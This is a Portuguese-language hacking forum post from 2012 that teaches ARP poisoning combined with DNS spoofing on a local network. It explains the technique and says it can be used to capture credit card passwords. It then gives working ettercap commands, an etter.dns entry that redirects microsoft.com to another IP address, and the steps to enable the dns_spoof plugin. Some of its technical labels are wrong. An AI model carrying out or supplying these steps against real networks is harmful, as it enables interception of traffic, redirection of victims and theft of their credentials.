Nylon Tecnologia
Mudamos para um dominio proprio.

Acesse nosso novo forum.

http://crawlersnetwork.com/

Participe do fórum, é rápido e fácil

Nylon Tecnologia
Mudamos para um dominio proprio.

Acesse nosso novo forum.

http://crawlersnetwork.com/
Nylon Tecnologia
Gostaria de reagir a esta mensagem? Crie uma conta em poucos cliques ou inicie sessão para continuar.

[Arp Poisoning + Dns Spoof]

Ir para baixo

[Arp Poisoning + Dns Spoof] Empty [Arp Poisoning + Dns Spoof]

Mensagem por Dr.Script Dom Ago 19, 2012 6:30 pm

- Boa noite, vamos a uma pequena instrodução antes de começar a pratica do ARP POISONING + DNS SPOOF .

O que é DNS spoofing ?

DNS spoofing é um ataque onde o hacker compromete um servidor de nomes (Domain Name System).

O servidor aceita e usa incorretamente a informação de um host que não tem autoridade de dar esta informação.

Utilizando esta técnica, o atacante pode direcionar o email ou navegador da vítima para o seu próprio servidor. Com isso ele pode, por exemplo, capturar senhas de cartões de crédito em sites de comprar.

Para executar esse tipo de ataque é necessário que o ARP-Poisoning seja realizado inicialmente.

A técnica de ARP-Poisoning é aplicada apenas em redes Ethernet. Basicamente, um sistema conectado a um IP ou LAN Ethernet tem dois endereços. O primeiro endereço é o MAC, que é atribuído à placa de rede (NIC[1]) possuída pelo usuário. Os endereços MAC são (ou supõe-se ser) únicos e utilizando esse endereço o protocolo Ethernet envia os dados. O protocolo Ethernet constrói frames de dados que consistem de blocos de 1500 bytes. Um frame Ethernet consiste do cabeçalho Ethernet, contendo o endereço MAC do computador origem e do computador destino.

O segundo endereço é o IP. O IP é um protocolo utilizado por aplicações, independente da tecnologia com que opera. Todo computador em uma rede deve possuir um endereço IP único para a comunicação. Os endereços IPs são virtuais e atribuídos pelo software.

IP e Ethernet devem trabalhar juntos. O IP comunica-se construindo pacotes que são diferentes da estrutura de frames. Esses pacotes são entregues pela camada de rede (Ethernet), que divide os pacotes em frames, adiciona um cabeçalho Ethernet e envia-os para um componente da rede. Este então decide a porta pela qual o frame deve ser enviado através da comparação do endereço destino do frame com uma tabela interna que mapeia os números das portas de um endereço MAC.

Como mencionado antes, um frame Ethernet é construído a partir de um pacote IP, mas para a construção de um frame Ethernet, a rede precisa do endereço MAC do computador destino. Aqui, a Ethernet sabe apenas o endereço IP da máquina destino.

Daí, para descobrir o endereço MAC do computador destino a partir de seu endereço IP, o protocolo ARP é utilizado.

Então tá Creditos ; Google (:

Vamos a pratica

Vamos ao terminal do Backtrack , e digitaremos

ettercap -Tq -M arp -o //

O sintax acima significa o envenenamento do cache DNS , da rede . Agora vamos procurar a pasta do ettercap geralmente encontrada na seguinte

root@bt:/usr/local/share/ettercap#

Vamos modificar o arquivos etter.dns , usaremos dentro da pasta ettercap a seguinte sintax
mcedit etter.dns , ira aparecer o editor de texto mcedit que funciona como um editor dentro da shell.

Como mostrará
Código:
#################################
# microsoft sucs ;)
# redirect it to www.linux.org
#

microsoft.com    A  189.73.192.230


Simplificando quando a vitima da rede digitar microsoft.com ela será redirecionada automaticamente ao 189.73.192.230 (GOOGLE) . Ta ok modificamos o etter.dns salva e vamos ao outros terminal que tinhamos executado a sinta ettercap -Tq -M arp -o// cancela essa operação dando um Ctrl+C . e na mesma shell execute

ettercap -Tq -M arp //

Aperte o 'H' , vai aparecer um menu , depois irá aparecer a seguinte informação
Inline help:

[vV] - change the visualization mode
[pP] - activate a plugin
[lL] - print the hosts list
[oO] - print the profiles list
[cC] - print the connections list
[sS] - print interfaces statistics
[<space>] - stop/cont printing packets
[qQ] - quit


digite o p , ele ira te mostrar os plugins , e vai pedir pra você digitar o nome de um plugin .Digite dns_spoof

Ira começar a envenenar sua rede . Enquanto sua shell executando o dns_spoof o envenenamento não para relembrando , isso pode causar PROBLEMAS na sua rede .


Se tiver algo errado, pode complementar ai galera !


Dr.Script
Dr.Script
Membro

Mensagens : 15
Pontos : 8578
Reputação : 10
Data de inscrição : 12/08/2012

Ir para o topo Ir para baixo

Ir para o topo


 
Permissões neste sub-fórum
Não podes responder a tópicos